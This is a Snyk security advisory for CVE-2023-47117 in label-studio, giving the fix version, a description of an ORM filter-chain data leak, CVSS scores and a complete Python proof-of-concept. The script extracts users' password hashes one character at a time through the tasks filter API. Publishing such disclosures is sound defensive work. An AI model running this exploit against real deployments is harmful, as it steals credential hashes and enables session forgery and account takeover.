Exposure of Sensitive Information to an Unauthorized Actor in label-studio | CVE-2023-47117

Q: How to fix?

Upgrade label-studio to version 1.9.2.post0 or higher.

Threat Intelligence

Proof of Concept

65.77% (99^th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

Snyk IDSNYK-PYTHON-LABELSTUDIO-6056277
published14 Nov 2023
disclosed13 Nov 2023
creditalex-elttam

Report a new vulnerability Found a mistake?

Introduced: 13 Nov 2023

CVE-2023-47117 (opens in a new tab) CWE-200 (opens in a new tab)

How to fix?

Upgrade label-studio to version 1.9.2.post0 or higher.

Overview

label-studio is a Label Studio annotation tool

Affected versions of this package are vulnerable to Exposure of Sensitive Information to an Unauthorized Actor through the application's ability to set filters for filtering tasks. An attacker can construct a filter chain to filter tasks based on sensitive fields for all user accounts on the platform by exploiting Django's Object Relational Mapper (ORM). As the results of the query can be manipulated by the ORM filter, an attacker can leak these sensitive fields character by character. Furthermore, the application had a hard coded secret key that an attacker can use to forge a session token of any user by exploiting this ORM Leak vulnerability to leak account password hashes.

PoC


import argparse
import re
import requests
import string
import sys

# Password hash characters
CHARS = string.ascii_letters + string.digits + '$/+=_!'
CHARS_LEN = len(CHARS)

PAYLOAD = {
    "data": {
        "columnsDisplayType": {},
        "columnsWidth": {},
        "filters": {
            "conjunction": "and",
            "items": [
                {
                    "filter": "filter:tasks:updated_by__active_organization__active_users__password", # ORM Leak filter chain
                    "operator": "regex", # Use regex operator to filter password hash value
                    "type": "String",
                    "value": "REPLACEME"
                }
            ]
        },
        "gridWidth": 4,
        "hiddenColumns":{"explore":["tasks:inner_id"],"labeling":["tasks:id","tasks:inner_id"]},
        "ordering": [],
        "search_text": None,
        "target": "tasks",
        "title": "Default",
        "type": "list"
    },
    "id": 1, # View ID
    "project": "1" # Project ID
}

def parse_args() -> argparse.Namespace:
    parser = argparse.ArgumentParser(
        description='Leak an accounts password hash by exploiting a ORM Leak vulnerability in Label Studio'
    )

    parser.add_argument(
        '-v', '--view-id',
        help='View id of the page',
        type=int,
        required=True
    )

    parser.add_argument(
        '-p', '--project-id',
        help='Project id to filter tasks for',
        type=int,
        required=True
    )

    parser.add_argument(
        '-c', '--cookie-str',
        help='Cookie string for authentication',
        required=True
    )

    parser.add_argument(
        '-u', '--url',
        help='Base URL to Label Studio instance',
        required=True
    )

    return parser.parse_args()

def setup() -> dict:
    args = parse_args()
    view_id = args.view_id
    project_id = args.project_id
    path_1 = "/api/dm/views/{view_id}?interaction=filter&project={project_id}".format(
        view_id=view_id,
        project_id=project_id
    )
    path_2 = "/api/tasks?page=1&page_size=1&view={view_id}&interaction=filter&project={project_id}".format(
        view_id=view_id,
        project_id=project_id
    )
    PAYLOAD["id"] = view_id
    PAYLOAD["project"] = str(project_id)
    
    config_dict = {
        'COOKIE_STR': args.cookie_str,
        'URL_PATH_1': args.url + path_1,
        'URL_PATH_2': args.url + path_2,
        'PAYLOAD': PAYLOAD
    }
    return config_dict

def test_payload(config_dict: dict, payload) -> bool:
    sys.stdout.flush()
    cookie_str = config_dict["COOKIE_STR"]
    r_set = requests.patch(
        config_dict["URL_PATH_1"],
        json=payload,
        headers={
            "Cookie": cookie_str
        }
    )

    r_listen = requests.get(
        config_dict['URL_PATH_2'],
        headers={
            "Cookie": cookie_str
        }
    )

    r_json = r_listen.json()
    return len(r_json["tasks"]) >= 1

def test_char(config_dict, known_hash, c):
    json_payload_suffix = PAYLOAD
    test_escaped = re.escape(known_hash + c)
    json_payload_suffix["data"]["filters"]["items"][0]["value"] =  f"^{test_escaped}"

    suffix_result = test_payload(config_dict, json_payload_suffix)
    if suffix_result:
        return (known_hash + c, c)
    
    return None

def main():
    config_dict = setup()
    # By default Label Studio password hashes start with these characters
    known_hash = "pbkdf2_sha256$260000$"
    print()
    print(f"dumped: {known_hash}", end="")
    sys.stdout.flush()

    while True:
        found = False

        for c in CHARS:
            r = test_char(config_dict, known_hash, c)
            if not r is None:
                new_hash, c = r
                known_hash = new_hash
                print(c, end="")
                sys.stdout.flush()
                found = True
                break

        if not found:
            break

    print()

if __name__ == "__main__":
    main()

References

CVSS Base Scores

version 3.1

Attack Vector (AV)
Network
Attack Complexity (AC)
Low
Privileges Required (PR)
None
User Interaction (UI)
None

Scope (S)
Unchanged

Confidentiality (C)
High
Integrity (I)
None
Availability (A)
None

Exposure of Sensitive Information to an Unauthorized Actor Affecting label-studio package, versions [,1.9.2.post0)

Severity